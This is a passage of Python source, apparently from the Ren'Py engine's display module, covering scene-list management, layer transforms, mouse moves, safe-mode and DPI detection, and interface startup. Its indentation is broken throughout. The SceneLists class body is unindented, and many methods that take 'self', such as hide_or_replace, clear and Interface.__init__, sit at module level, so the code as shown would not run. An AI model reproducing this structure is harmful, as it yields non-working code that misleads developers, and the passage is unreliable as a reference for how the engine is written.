        xpos, ypos = place(width, height, surf.width, surf.height, placement)
        xpos += x
        ypos += y
        pos = (xpos, ypos)
        if dest is not None:
            if subpixel:
                dest.subpixel_blit(surf, pos, main, main, None)
            else:
                dest.blit(surf, pos, main, main, None)
        return pos
    def set_transform_event(self, event):
        """
        Sets the transform event of this displayable to event.
        """
        if event == self.transform_event:
            return
        self.transform_event = event
        if self.transform_event_responder:
            renpy.display.render.redraw(self, 0)
    def _handles_event(self, event):
        """
        Returns True if the displayable handles event, False otherwise.
        """
        return False
    def _hide(self, st, at, kind):
        """
        Returns None if this displayable is ready to be hidden, or
        a replacement displayable if it doesn't want to be hidden
        quite yet. Kind is either "hide" or "replaced".
        """
        return None
    def _show(self):
        """
        Called when the displayable is added to a scene list.
        """
    def _target(self):
        """
        If this displayable is part of a chain of one or more references,
        returns the ultimate target of those references. Otherwise, returns
        the displayable.
        """
        return self
    def _change_transform_child(self, child):
        """
        If this is a transform, makes a copy of the transform and sets
        the child of the innermost transform to this. Otherwise,
        simply returns child.
        """
        return child
    def _clear(self):
        """
        Clears out the children of this displayable, if any.
        """
        return
    def _tts_common(self, default_alt=None):
        # Collects the self-voicing text of the children, joined with ": ",
        # then substitutes it into the alt text (if any).
        rv = [ ]
        for i in self.visit():
            if i is not None:
                speech = i._tts()
                if speech.strip():
                    rv.append(speech)
        rv = ": ".join(rv)
        rv = rv.replace("::", ":")
        rv = rv.replace(": :", ":")
        alt = self.style.alt
        if alt is None:
            alt = default_alt
        if alt is not None:
            rv = renpy.substitutions.substitute(alt, scope={ "text" : rv })[0]
        return rv
    def _tts(self):
        """
        Returns the self-voicing text of this displayable and all of its
        children that cannot take focus. If the displayable can take focus,
        returns the empty string.
        """
        return self._tts_common()
    def _tts_all(self):
        """
        Returns the self-voicing text of this displayable and all of its
        children that cannot take focus.
        """
        return self._tts_common()
class SceneListEntry(renpy.object.Object):
    """
    Represents a scene list entry. Since this was replacing a tuple,
    it should be treated as immutable after its initial creation.
    """

    def __init__(self, tag, zorder, show_time, animation_time, displayable, name):
        self.tag = tag
        self.zorder = zorder
        self.show_time = show_time
        self.animation_time = animation_time
        self.displayable = displayable
        self.name = name

    def _as_tuple(self):
        # The historical tuple form - note that name is not part of it.
        return (self.tag, self.zorder, self.show_time, self.animation_time, self.displayable)

    def __iter__(self):
        return iter(self._as_tuple())

    def __getitem__(self, index):
        return self._as_tuple()[index]

    def __repr__(self):
        return "<SLE: %r %r %r>" % (self.tag, self.name, self.displayable)

    def copy(self):
        return SceneListEntry(
            self.tag,
            self.zorder,
            self.show_time,
            self.animation_time,
            self.displayable,
            self.name)

    def update_time(self, time):
        # Copy first when either time is None, so the original is not
        # mutated in that case; the or-assignments then fill in the times.
        rv = self

        if self.show_time is None or self.animation_time is None:
            rv = self.copy()

        rv.show_time = rv.show_time or time
        rv.animation_time = rv.animation_time or time

        return rv
class SceneLists(renpy.object.Object):
"""
This stores the current scene lists that are being used to display
things to the user.
"""
__version__ = 7
def after_setstate(self):
for i in renpy.config.layers + renpy.config.top_layers:
if i not in self.layers:
self.layers[i] = [ ]
self.at_list[i] = { }
self.layer_at_list[i] = (None, [ ])
    def after_upgrade(self, version):
        # Migrates data pickled by older versions of this class, one
        # version stanza at a time.
        # <1: per-layer at-list bookkeeping did not exist yet.
        if version < 1:
            self.at_list = { }
            self.layer_at_list = { }
            for i in renpy.config.layers + renpy.config.top_layers:
                self.at_list[i] = { }
                self.layer_at_list[i] = (None, [ ])
        # <3: shown_window flag did not exist.
        if version < 3:
            self.shown_window = False
        # <4: entries were plain tuples; wrap them in SceneListEntry
        # (with a None name) and add the additional_transient list.
        if version < 4:
            for k in self.layers:
                self.layers[k] = [ SceneListEntry(*(i + (None,)) ) for i in self.layers[k] ]
            self.additional_transient = [ ]
        # <5: no default drag group.
        if version < 5:
            self.drag_group = None
        # <6: the shown-images record was stored as image_predict_info.
        if version < 6:
            self.shown = self.image_predict_info
        # <7: per-layer transforms did not exist.
        if version < 7:
            self.layer_transform = { }
    def __init__(self, oldsl, shown):
        """
        `oldsl`
            The previous SceneLists to copy state from, or a false value to
            start empty.

        `shown`
            The record of currently-shown images.
        """
        super(SceneLists, self).__init__()
        # Has a window been shown as part of these scene lists?
        self.shown_window = False
        # A map from layer name -> list(SceneListEntry)
        self.layers = { }
        # A map from layer name -> tag -> at_list associated with that tag.
        self.at_list = { }
        # A map from layer to (start time, at_list), where the at list has
        # been applied to the layer as a whole.
        self.layer_at_list = { }
        # The current shown images,
        self.shown = shown
        # A list of (layer, tag) pairs that are considered to be
        # transient.
        self.additional_transient = [ ]
        # Either None, or a DragGroup that's used as the default for
        # drags with names.
        self.drag_group = None
        # A map from a layer to the transform that applies to that
        # layer.
        self.layer_transform = { }
        if oldsl:
            # Copy the per-layer state from the old scene lists, tolerating
            # layers that did not exist in it.
            for i in renpy.config.layers + renpy.config.top_layers:
                try:
                    self.layers[i] = oldsl.layers[i][:]
                except KeyError:
                    self.layers[i] = [ ]
                if i in oldsl.at_list:
                    self.at_list[i] = oldsl.at_list[i].copy()
                    self.layer_at_list[i] = oldsl.layer_at_list[i]
                else:
                    self.at_list[i] = { }
                    self.layer_at_list[i] = (None, [ ])
            # Overlay layers start each interaction empty.
            for i in renpy.config.overlay_layers:
                self.clear(i)
            self.replace_transient(prefix=None)
            self.focused = None
            self.drag_group = oldsl.drag_group
            self.layer_transform.update(oldsl.layer_transform)
        else:
            for i in renpy.config.layers + renpy.config.top_layers:
                self.layers[i] = [ ]
                self.at_list[i] = { }
                self.layer_at_list[i] = (None, [ ])
        self.music = None
        self.focused = None
    def replace_transient(self, prefix="hide"):
        """
        Replaces the contents of the transient display list with
        a copy of the master display list. This is used after a
        scene is displayed to get rid of transitions and interface
        elements.

        `prefix`
            The prefix/event to use. Set this to None to prevent the hide
            from happening.
        """
        for i in renpy.config.transient_layers:
            self.clear(i, True)
        # Entries explicitly marked transient are removed individually, so
        # they get a chance to run their hide animation.
        for layer, tag in self.additional_transient:
            self.remove(layer, tag, prefix=prefix)
        self.additional_transient = [ ]
def transient_is_empty(self):
"""
This returns True if all transient layers are empty. This is
used by the rollback code, as we can't start a new rollback
if there is something in a transient layer (as things in the
transient layer may contain objects that cannot be pickled,
like lambdas.)
"""
for i in renpy.config.transient_layers:
if self.layers[i]:
return False
return True
    def transform_state(self, old_thing, new_thing, execution=False):
        """
        If the old thing is a transform, then move the state of that transform
        to the new thing.

        `execution`
            When true, execution state (in addition to value state) is also
            copied.
        """
        if old_thing is None:
            return new_thing
        # Don't bother wrapping screens, as they can't be transformed.
        if isinstance(new_thing, renpy.display.screen.ScreenDisplayable):
            return new_thing
        # Optionally look through reference chains to the underlying
        # transforms, depending on configuration.
        if renpy.config.take_state_from_target:
            old_transform = old_thing._target()
        else:
            old_transform = old_thing
        if not isinstance(old_transform, renpy.display.motion.Transform):
            return new_thing
        if renpy.config.take_state_from_target:
            new_transform = new_thing._target()
        else:
            new_transform = new_thing
        # Wrap the new thing in a Transform if needed, so it has somewhere
        # to receive the old state.
        if not isinstance(new_transform, renpy.display.motion.Transform):
            new_thing = new_transform = renpy.display.motion.Transform(child=new_thing)
        new_transform.take_state(old_transform)
        if execution:
            new_transform.take_execution_state(old_transform)
        return new_thing
    def find_index(self, layer, tag, zorder, behind):
        """
        This finds the spot in the named layer where we should insert the
        displayable. It returns two things: an index at which the new thing
        should be added, and an index at which the old thing should be hidden.
        (Note that the indexes are relative to the current state of the list,
        which may change on an add or remove.)
        """
        add_index = None
        remove_index = None
        # First pass: find an existing entry with the same tag (or the same
        # displayable) to be replaced, inheriting its zorder if none given.
        for i, sle in enumerate(self.layers[layer]):
            if remove_index is None:
                if (sle.tag and sle.tag == tag) or sle.displayable == tag:
                    remove_index = i
                    if zorder is None:
                        zorder = sle.zorder
        if zorder is None:
            zorder = renpy.config.tag_zorder.get(tag, 0)
        # Second pass: insert before the first entry with a higher zorder,
        # or - at equal zorder - before the same tag or anything in `behind`.
        for i, sle in enumerate(self.layers[layer]):
            if add_index is None:
                if sle.zorder == zorder:
                    if sle.tag and (sle.tag == tag or sle.tag in behind):
                        add_index = i
                elif sle.zorder > zorder:
                    add_index = i
        if add_index is None:
            add_index = len(self.layers[layer])
        return add_index, remove_index, zorder
    def add(self,
            layer,
            thing,
            key=None,
            zorder=0,
            behind=[ ],
            at_list=[ ],
            name=None,
            atl=None,
            default_transform=None,
            transient=False,
            keep_st=False):
        """
        Adds something to this scene list. Some of these names are quite a bit
        out of date.

        `thing` - The displayable to add.

        `key` - A string giving the tag associated with this thing.

        `zorder` - Where to place this thing in the zorder, an integer
        A greater value means closer to the user.

        `behind` - A list of tags to place the thing behind.

        `at_list` - The at_list associated with this
        displayable. Counterintunitively, this is not actually
        applied, but merely stored for future use.

        `name` - The full name of the image being displayed. This is used for
        image lookup.

        `atl` - If not None, an atl block applied to the thing. (This actually is
        applied here.)

        `default_transform` - The default transform that is used to initialized
        the values in the other transforms.

        `keep_st`
            If true, we preserve the shown time of a replaced displayable.
        """
        if not isinstance(thing, Displayable):
            raise Exception("Attempting to show something that isn't a displayable:" + repr(thing))
        if layer not in self.layers:
            raise Exception("Trying to add something to non-existent layer '%s'." % layer)
        if key:
            self.remove_hide_replaced(layer, key)
            self.at_list[layer][key] = at_list
        if key and name:
            self.shown.predict_show(layer, name)
        if transient:
            self.additional_transient.append((layer, key))
        l = self.layers[layer]
        if atl:
            thing = renpy.display.motion.ATLTransform(atl, child=thing)
        add_index, remove_index, zorder = self.find_index(layer, key, zorder, behind)
        at = None
        st = None
        if remove_index is not None:
            # Replacing an existing entry: carry over its animation time
            # (and, optionally, show time), and migrate transform state.
            sle = l[remove_index]
            old = sle.displayable
            at = sle.animation_time
            if keep_st:
                st = sle.show_time
            # When a bare show replaces a running transform, the old
            # transform can be kept running with the new child.
            if (not atl and
                not at_list and
                renpy.config.keep_running_transform and
                isinstance(old, renpy.display.motion.Transform)):
                thing = sle.displayable._change_transform_child(thing)
            else:
                thing = self.transform_state(l[remove_index].displayable, thing)
            thing.set_transform_event("replace")
            thing._show()
        else:
            # A fresh show: seed transform state from the default transform.
            if not isinstance(thing, renpy.display.motion.Transform):
                thing = self.transform_state(default_transform, thing)
            thing.set_transform_event("show")
            thing._show()
        sle = SceneListEntry(key, zorder, st, at, thing, name)
        l.insert(add_index, sle)
        if remove_index is not None:
            # The insert above shifts the old entry down one slot when the
            # new entry lands at or before it.
            if add_index <= remove_index:
                remove_index += 1
            self.hide_or_replace(layer, remove_index, "replaced")
def hide_or_replace(self, layer, index, prefix):
    """
    Hides or replaces the scene list entry at the given
    index. `prefix` is a prefix that is used if the entry
    decides it doesn't want to be hidden quite yet.

    `layer`
        The name of the layer the entry lives on.
    `index`
        The index of the entry in that layer's list, or None to do
        nothing.
    `prefix`
        Normally "hide" or "replaced"; None causes the entry to be
        removed immediately, without the _hide protocol.
    """

    if index is None:
        return

    l = self.layers[layer]
    oldsle = l[index]

    now = get_time()

    # Fall back to the current time if the entry's times were never set.
    st = oldsle.show_time or now
    at = oldsle.animation_time or now

    # Skip the _hide protocol entirely when the displayable doesn't
    # handle the hide/replaced event.
    if renpy.config.fast_unhandled_event:
        if not oldsle.displayable._handles_event(prefix):
            prefix = None

    if (prefix is not None) and oldsle.tag:

        d = oldsle.displayable._hide(now - st, now - at, prefix)

        # _hide can mutate the layers, so we need to recompute
        # index.
        index = l.index(oldsle)

        if d is not None:

            # The displayable wants to stick around while it animates out:
            # keep it in the list under a "<prefix>$<tag>" pseudo-tag.
            sle = SceneListEntry(
                prefix + "$" + oldsle.tag,
                oldsle.zorder,
                st,
                at,
                d,
                None)
            l[index] = sle

            return

    l.pop(index)
def get_all_displayables(self):
    """
    Returns a list of every displayable reachable from this scene
    list, across all layers.
    """

    return [ sle.displayable
             for layer_entries in self.layers.itervalues()
             for sle in layer_entries ]
def remove_above(self, layer, thing):
    """
    Removes everything on the layer that is closer to the user
    than `thing`, which may be either a tag or a displayable. If
    `thing` is not displayed, everything on the layer is removed.
    """

    # Walk backwards (front-most first) so index shifts caused by
    # hide_or_replace don't affect entries we haven't visited yet.
    for index in reversed(xrange(len(self.layers[layer]))):

        entry = self.layers[layer][index]

        if thing:
            if entry.tag == thing or entry.displayable == thing:
                break

        # Entries already hiding/being replaced are left alone.
        if entry.tag and "$" in entry.tag:
            continue

        self.hide_or_replace(layer, index, "hide")
def remove(self, layer, thing, prefix="hide"):
    """
    Thing is either a key or a displayable. This iterates through the
    named layer, searching for entries matching the thing.
    When they are found, they are removed from the displaylist.

    It's not an error to remove something that isn't in the layer in
    the first place.

    `prefix`
        Passed on to hide_or_replace; normally "hide" or "replaced".
    """

    if layer not in self.layers:
        raise Exception("Trying to remove something from non-existent layer '%s'." % layer)

    _add_index, remove_index, _zorder = self.find_index(layer, thing, 0, [ ])

    if remove_index is not None:
        tag = self.layers[layer][remove_index].tag

        if tag:
            # Update image prediction state and drop the stored at list.
            self.shown.predict_hide(layer, (tag,))
            self.at_list[layer].pop(tag, None)

        self.hide_or_replace(layer, remove_index, prefix)
def clear(self, layer, hide=False):
    """
    Clears the named layer, making it empty.

    If hide is True, then objects are hidden. Otherwise, they are
    totally wiped out.
    """

    if layer not in self.layers:
        return

    if not hide:
        self.layers[layer] = [ ]

    else:

        # Have to iterate in reverse order, since otherwise
        # the indexes might change.
        for i in reversed(xrange(len(self.layers[layer]))):
            # NOTE(review): `hide` (a truthy value) is passed as the
            # prefix here rather than the string "hide" - confirm
            # callers using hide=True pass a string prefix, since
            # hide_or_replace concatenates the prefix with "$".
            self.hide_or_replace(layer, i, hide)

    # Reset the per-layer bookkeeping.
    self.at_list[layer].clear()
    self.shown.predict_scene(layer)

    self.layer_at_list[layer] = (None, [ ])
def set_layer_at_list(self, layer, at_list, reset=True):
    """
    Stores a copy of `at_list` as the at list for `layer`, with no
    associated time yet. When `reset` is true, the cached layer
    transform is discarded as well.
    """

    copied = list(at_list)
    self.layer_at_list[layer] = (None, copied)

    if reset:
        self.layer_transform[layer] = None
def set_times(self, time):
    """
    This finds entries with a time of None, and replaces that
    time with the given time.
    """

    # Fill in the start time for layer at-lists that don't have one yet.
    for l, (t, list) in self.layer_at_list.items(): # @ReservedAssignment
        self.layer_at_list[l] = (t or time, list)

    # Propagate the time into every scene list entry. update_time
    # presumably returns an entry with None times filled in - confirm
    # in SceneListEntry.update_time.
    for l, ll in self.layers.iteritems():
        self.layers[l] = [ i.update_time(time) for i in ll ]
def showing(self, layer, name):
    """
    Returns true if something with the prefix of the given name
    is being shown on `layer`, according to the shown-images
    tracker.
    """

    tracker = self.shown
    return tracker.showing(layer, name)
def get_showing_tags(self, layer):
    """
    Returns the tags currently showing on `layer`, as reported by
    the shown-images tracker.
    """
    return self.shown.get_showing_tags(layer)
def get_sorted_tags(self, layer):
    """
    Returns the tags of the entries on `layer` in list (back-to-front)
    order, skipping untagged entries and entries that are hiding or
    being replaced.
    """

    return [ sle.tag
             for sle in self.layers[layer]
             if sle.tag and "$" not in sle.tag ]
def make_layer(self, layer, properties):
    """
    Creates a Fixed with the given layer name and scene_list.

    `properties`
        Layout properties (e.g. position/clipping) applied to the
        MultiBox holding the layer's scene list.

    Returns the layer displayable, possibly wrapped by the layer's
    at-list transforms.
    """

    rv = renpy.display.layout.MultiBox(layout='fixed', focus=layer, **properties)
    rv.append_scene_list(self.layers[layer])
    rv.layer_name = layer
    rv._duplicatable = False

    time, at_list = self.layer_at_list[layer]

    old_transform = self.layer_transform.get(layer, None)
    new_transform = None

    if at_list:

        for a in at_list:

            if isinstance(a, renpy.display.motion.Transform):
                rv = a(child=rv)
                new_transform = rv
            else:
                # A callable wrapper (e.g. a curried function) that
                # produces the wrapped displayable.
                rv = a(rv)

        # Carry transform state over from the previous version of this
        # layer, so the transform doesn't restart on each interaction.
        if (new_transform is not None) and (renpy.config.keep_show_layer_state):
            self.transform_state(old_transform, new_transform, execution=True)

        f = renpy.display.layout.MultiBox(layout='fixed')
        f.add(rv, time, time)
        f.layer_name = layer

        rv = f

    self.layer_transform[layer] = new_transform

    return rv
def remove_hide_replaced(self, layer, tag):
    """
    Removes entries on `layer` that are in the process of hiding or
    being replaced and that carry the given `tag`.
    """

    doomed = ("hide$" + tag, "replaced$" + tag)

    self.layers[layer] = [
        entry for entry in self.layers[layer]
        if entry.tag not in doomed
    ]
def remove_hidden(self):
    """
    Goes through all of the layers, and removes things that are
    hidden and are no longer being kept alive by their hide
    methods.
    """

    now = get_time()

    for l in self.layers:
        newl = [ ]

        for sle in self.layers[l]:

            if sle.tag:

                if sle.tag.startswith("hide$"):
                    # Give the displayable another chance to finish its
                    # hide animation; a falsy result means it's done.
                    d = sle.displayable._hide(now - sle.show_time, now - sle.animation_time, "hide")
                    if not d:
                        continue

                elif sle.tag.startswith("replaced$"):
                    d = sle.displayable._hide(now - sle.show_time, now - sle.animation_time, "replaced")
                    if not d:
                        continue

            newl.append(sle)

        self.layers[l] = newl
def remove_all_hidden(self):
    """
    Removes every hiding/replaced entry immediately, without waiting
    for its hide method to finish. (Used when making a rollback copy.)
    """

    for layer_name in self.layers:

        kept = [ sle for sle in self.layers[layer_name]
                 if not (sle.tag and "$" in sle.tag) ]

        self.layers[layer_name] = kept
def get_displayable_by_tag(self, layer, tag):
    """
    Returns the displayable on the layer with the given tag, or None
    if no such displayable exists. Note that this will usually return
    a Transform.

    Raises Exception if `layer` does not exist.
    """

    if layer not in self.layers:
        raise Exception("Unknown layer %r." % layer)

    matches = (sle.displayable for sle in self.layers[layer] if sle.tag == tag)
    return next(matches, None)
def get_displayable_by_name(self, layer, name):
    """
    Returns the displayable on the layer with the given name, or None
    if no such displayable exists. Note that this will usually return
    a Transform.

    Raises Exception if `layer` does not exist.
    """

    if layer not in self.layers:
        raise Exception("Unknown layer %r." % layer)

    matches = (sle.displayable for sle in self.layers[layer] if sle.name == name)
    return next(matches, None)
def get_image_bounds(self, layer, tag, width, height):
    """
    Implements renpy.get_image_bounds().

    Returns an (x, y, w, h) tuple giving the placement of the image
    with `tag` on `layer` when rendered into a `width` x `height`
    area, or None if the tag is not showing.
    """

    if layer not in self.layers:
        raise Exception("Unknown layer %r." % layer)

    for sle in self.layers[layer]:
        if sle.tag == tag:
            break
    else:
        return None

    now = get_time()

    # Compute shown/animation times for the render; 0 if never set.
    if sle.show_time is not None:
        st = now - sle.show_time
    else:
        st = 0

    if sle.animation_time is not None:
        at = now - sle.animation_time
    else:
        at = 0

    surf = renpy.display.render.render_for_size(sle.displayable, width, height, st, at)

    sw = surf.width
    sh = surf.height

    # Resolve the displayable's placement within the given area.
    x, y = place(width, height, sw, sh, sle.displayable.get_placement())

    return (x, y, sw, sh)
def scene_lists(index=-1):
    """
    Returns either the current scenelists object, or the one for the
    context at the given index.
    """

    context = renpy.game.context(index)
    return context.scene_lists
class MouseMove(object):
    """
    Represents an in-progress programmatic mouse move, animating the
    pointer from its position at construction time to (x, y) over
    `duration` seconds (None means move immediately).
    """

    def __init__(self, x, y, duration):
        # When the move began.
        self.start = get_time()

        # A None duration is treated as an instantaneous move.
        if duration is None:
            self.duration = 0
        else:
            self.duration = duration

        self.start_x, self.start_y = renpy.display.draw.get_mouse_pos()

        self.end_x = x
        self.end_y = y

    def perform(self):
        """
        Performs the mouse move. Returns True if this should be called
        again, or False if the move has finished.
        """

        elapsed = get_time() - self.start

        if elapsed >= self.duration:
            # Snap to the final position and finish.
            renpy.display.draw.set_mouse_pos(self.end_x, self.end_y)
            return False

        # Linear interpolation between the start and end positions.
        fraction = 1.0 * elapsed / self.duration

        cur_x = int(self.start_x + fraction * (self.end_x - self.start_x))
        cur_y = int(self.start_y + fraction * (self.end_y - self.start_y))

        renpy.display.draw.set_mouse_pos(cur_x, cur_y)
        return True
def get_safe_mode():
    """
    Returns true if we should go into safe mode.
    """

    if renpy.safe_mode_checked:
        return False

    try:
        # Safe mode only works on Windows, where it's triggered by
        # holding shift while the game starts.
        if not renpy.windows:
            return False

        import ctypes

        VK_SHIFT = 0x10

        ctypes.windll.user32.GetKeyState.restype = ctypes.c_ushort
        return bool(ctypes.windll.user32.GetKeyState(VK_SHIFT) & 0x8000)

    except:
        return False
# How long should we be in maximum framerate mode at the start of the game?
# (In seconds; consumed by Interface.maximum_framerate during __init__.)
initial_maximum_framerate = 0.0
class Interface(object):
    """
    This represents the user interface that interacts with the user.
    It manages the Display objects that display things to the user, and
    also handles accepting and responding to user input.

    @ivar display: The display that we used to display the screen.

    @ivar profile_time: The time of the last profiling.

    @ivar screenshot: A screenshot (PNG data), or None if no screenshot
    has been taken.

    @ivar old_scene: The last thing that was displayed to the screen.

    @ivar transition: A map from layer name to the transition that will
    be applied the next time interact restarts.

    @ivar transition_time: A map from layer name to the time the
    transition involving that layer started.

    @ivar transition_from: A map from layer name to the scene that we're
    transitioning from on that layer.

    @ivar suppress_transition: If True, then the next transition will not
    happen.

    @ivar force_redraw: If True, a redraw is forced.

    @ivar restart_interaction: If True, the current interaction will
    be restarted.

    @ivar pushed_event: If not None, an event that was pushed back
    onto the stack.

    @ivar mouse: The name of the mouse cursor to use during the current
    interaction.

    @ivar ticks: The number of 20hz ticks.

    @ivar frame_time: The time at which we began drawing this frame.

    @ivar interact_time: The time of the start of the first frame of the
    current interact_core.

    @ivar time_event: A singleton ignored event.

    @ivar event_time: The time of the current event.

    @ivar timeout_time: The time at which the timeout will occur.
    """
def __init__(self):
    """
    Initializes the interface state, per-layer properties, audio,
    pygame, and timing. Note the ordering below: timing is initialized
    before the mouse event time is recorded, and safe mode is checked
    before DPI scaling is computed.
    """

    # PNG data and the surface for the current file screenshot.
    self.screenshot = None
    self.screenshot_surface = None

    self.old_scene = { }
    self.transition = { }
    self.ongoing_transition = { }
    self.transition_time = { }
    self.transition_from = { }
    self.suppress_transition = False
    self.quick_quit = False
    self.force_redraw = False
    self.restart_interaction = False
    self.pushed_event = None
    self.ticks = 0
    self.mouse = 'default'
    self.timeout_time = None
    self.last_event = None
    self.current_context = None
    self.roll_forward = None

    # Things to be preloaded.
    self.preloads = [ ]

    # The time at which this draw occurs.
    self.frame_time = 0

    # The time when this interaction occurred.
    self.interact_time = None

    # The time we last tried to quit.
    self.quit_time = 0

    # Are we currently processing the quit event?
    self.in_quit_event = False

    self.time_event = pygame.event.Event(TIMEEVENT)
    self.redraw_event = pygame.event.Event(REDRAW)

    # Are we focused?
    self.mouse_focused = True
    self.keyboard_focused = True

    # Properties for each layer.
    self.layer_properties = { }

    # Have we shown the window this interaction?
    self.shown_window = False

    # Are we in fullscreen mode?
    self.fullscreen = False

    # Should we ignore the rest of the current touch? Used to ignore the
    # rest of a mousepress after a longpress occurs.
    self.ignore_touch = False

    # Should we clear the screenshot at the start of the next interaction?
    self.clear_screenshot = False

    # Compute layout properties (including clipping) for every layer.
    for layer in renpy.config.layers + renpy.config.top_layers:
        if layer in renpy.config.layer_clipping:
            x, y, w, h = renpy.config.layer_clipping[layer]
            self.layer_properties[layer] = dict(
                xpos=x,
                xanchor=0,
                ypos=y,
                yanchor=0,
                xmaximum=w,
                ymaximum=h,
                xminimum=w,
                yminimum=h,
                clipping=True,
            )

        else:
            self.layer_properties[layer] = dict()

    # A stack giving the values of self.transition and self.transition_time
    # for contexts outside the current one. This is used to restore those
    # in the case where nothing has changed in the new context.
    self.transition_info_stack = [ ]

    # The time when the event was dispatched.
    self.event_time = 0

    # The time we saw the last mouse event.
    self.mouse_event_time = None

    # Should we show the mouse?
    self.show_mouse = True

    # Should we reset the display?
    self.display_reset = False

    # The last size we were resized to.
    self.last_resize = None

    # The thread that can do display operations.
    self.thread = threading.current_thread()

    # Initialize audio.
    renpy.audio.audio.init()

    # Initialize pygame.
    try:
        pygame.display.init()
    except:
        pass

    # Init timing.
    init_time()
    self.mouse_event_time = get_time()

    # The current window caption.
    self.window_caption = None

    renpy.game.interface = self
    renpy.display.interface = self

    # Are we in safe mode, from holding down shift at start?
    self.safe_mode = False

    # Do we need a background screenshot?
    self.bgscreenshot_needed = False

    # Event used to signal background screenshot taken.
    self.bgscreenshot_event = threading.Event()

    # The background screenshot surface.
    self.bgscreenshot_surface = None

    # Mouse move. If not None, information about the current mouse
    # move.
    self.mouse_move = None

    # If in text editing mode, the current text editing event.
    self.text_editing = None

    # The text rectangle after the current draw.
    self.text_rect = None

    # The text rectangle after the previous draw.
    self.old_text_rect = None

    # Are we a touchscreen?
    self.touch = renpy.exports.variant("touch")

    # Should we restart the interaction?
    self.restart_interaction = True

    # For compatibility with older code.
    if renpy.config.periodic_callback:
        renpy.config.periodic_callbacks.append(renpy.config.periodic_callback)

    renpy.display.emulator.init_emulator()

    # Has start been called?
    self.started = False

    # Are we in fullscreen video mode?
    self.fullscreen_video = False

    self.safe_mode = get_safe_mode()
    renpy.safe_mode_checked = True

    # A scale factor used to compensate for the system DPI.
    self.dpi_scale = self.setup_dpi_scaling()

    renpy.display.log.write("DPI scale factor: %f", self.dpi_scale)

    # A time until which we should draw at maximum framerate.
    self.maximum_framerate_time = 0.0
    self.maximum_framerate(initial_maximum_framerate)

    # True if this is the first interact.
    self.start_interact = True

    # The time of each frame.
    self.frame_times = [ ]

    # The duration of each frame, in seconds.
    self.frame_duration = 1.0 / 60.0
def setup_dpi_scaling(self):
    """
    Computes the DPI scale factor for the current system.

    The RENPY_HIGHDPI environment variable overrides detection. On
    non-Windows platforms this always returns 1.0; on Windows the
    logical DPI is queried via ctypes, with 1.0 as the fallback on
    any failure.
    """

    if "RENPY_HIGHDPI" in os.environ:
        return float(os.environ["RENPY_HIGHDPI"])

    if not renpy.windows:
        return 1.0

    try:
        import ctypes
        from ctypes import c_void_p, c_int

        # Opt out of Windows' automatic DPI virtualization, then read
        # the logical pixels-per-inch from the screen device context.
        ctypes.windll.user32.SetProcessDPIAware()

        GetDC = ctypes.windll.user32.GetDC
        GetDC.restype = c_void_p
        GetDC.argtypes = [ c_void_p ]

        ReleaseDC = ctypes.windll.user32.ReleaseDC
        ReleaseDC.argtypes = [ c_void_p, c_void_p ]

        GetDeviceCaps = ctypes.windll.gdi32.GetDeviceCaps
        GetDeviceCaps.restype = c_int
        GetDeviceCaps.argtypes = [ c_void_p, c_int ]

        LOGPIXELSX = 88

        dc = GetDC(None)

        # 96 DPI is the Windows baseline, so the scale is dpi / 96.
        rv = GetDeviceCaps(dc, LOGPIXELSX) / 96.0
        ReleaseDC(None, dc)

        if rv < renpy.config.de_minimus_dpi_scale:
            renpy.display.log.write("De minimus DPI scale, was %r", rv)
            rv = 1.0

        return rv

    except:
        renpy.display.log.write("Could not determine DPI scale factor:")
        renpy.display.log.exception()
        return 1.0
def start(self):
    """
    Starts the interface, by opening a window and setting the mode.
    Safe to call more than once; only the first call does anything.
    """

    if self.started:
        return

    # Reclaim garbage accumulated during startup.
    gc.collect()

    if gc.garbage:
        gc.garbage[:] = [ ]

    renpy.display.render.render_ready()

    # Kill off the presplash.
    renpy.display.presplash.end()

    renpy.main.log_clock("Interface start")

    self.started = True

    self.set_mode()

    # Load the image fonts.
    renpy.text.font.load_fonts()

    # Setup periodic event.
    pygame.time.set_timer(PERIODIC, PERIODIC_INTERVAL)

    # Don't grab the screen.
    pygame.event.set_grab(False)

    if not self.safe_mode:
        renpy.display.controller.init()

    s = "Total time until interface ready: {}s".format(time.time() - import_time)

    renpy.display.log.write(s)

    if renpy.android and not renpy.config.log_to_stdout:
        print(s)
def post_init(self):
    """
    This is called after display init, but before the window is created.

    Sets SDL hints, the window class/caption/icon, key repeat, the
    android wakelock, and blocks pygame events Ren'Py doesn't use.
    """

    # Stay visible when focus is lost in fullscreen.
    pygame.display.hint("SDL_VIDEO_MINIMIZE_ON_FOCUS_LOSS", "0")

    # Needed for Unity.
    wmclass = renpy.config.save_directory or os.path.basename(sys.argv[0])
    os.environ[b'SDL_VIDEO_X11_WMCLASS'] = wmclass.encode("utf-8")

    self.set_window_caption(force=True)
    self.set_icon()

    if renpy.config.key_repeat is not None:
        delay, repeat_delay = renpy.config.key_repeat
        pygame.key.set_repeat(int(1000 * delay), int(1000 * repeat_delay))

    if android:
        android.wakelock(True)

    # Block events we don't use.
    for i in pygame.event.get_standard_events():

        if i in enabled_events:
            continue

        if i in renpy.config.pygame_events:
            continue

        pygame.event.set_blocked(i)
def set_icon(self):
    """
    This is called to set up the window icon.
    """

    # Window icon.
    icon = renpy.config.window_icon

    if icon:

        im = renpy.display.scale.image_load_unscaled(
            renpy.loader.load(icon),
            icon,
        )

        # Pad the icon out to a square, centering the original image.
        iw, ih = im.get_size()
        imax = max(iw, ih)
        square_im = renpy.display.pgrender.surface_unscaled((imax, imax), True)
        square_im.blit(im, ( (imax-iw)/2, (imax-ih)/2 ))
        im = square_im

        pygame.display.set_icon(im)
def set_window_caption(self, force=False):
    """
    Computes the window caption from the configured title and the
    store's subtitle, and applies it when it has changed (or when
    `force` is true).
    """

    window_title = renpy.config.window_title

    if window_title is None:
        window_title = "A Ren'Py Game"

    caption = renpy.translation.translate_string(window_title) + renpy.store._window_subtitle

    if renpy.exports.get_autoreload():
        caption += " - autoreload"

    # Avoid touching the window when nothing changed.
    if (caption == self.window_caption) and not force:
        return

    self.window_caption = caption
    pygame.display.set_caption(caption.encode("utf-8"))
def iconify(self):
    """
    Minimizes (iconifies) the game window.
    """
    pygame.display.iconify()
def get_draw_constructors(self):
    """
    Figures out the list of draw constructors to try.

    Returns a list of instantiated draw objects, in the order
    set_mode should attempt them.
    """

    renderer = renpy.game.preferences.renderer
    renderer = os.environ.get("RENPY_RENDERER", renderer)

    # Safe mode forces software rendering.
    if self.safe_mode:
        renderer = "sw"

    # ANGLE is Windows-only.
    if (renderer == "angle") and (not renpy.windows):
        renderer = "auto"

    renpy.config.renderer = renderer

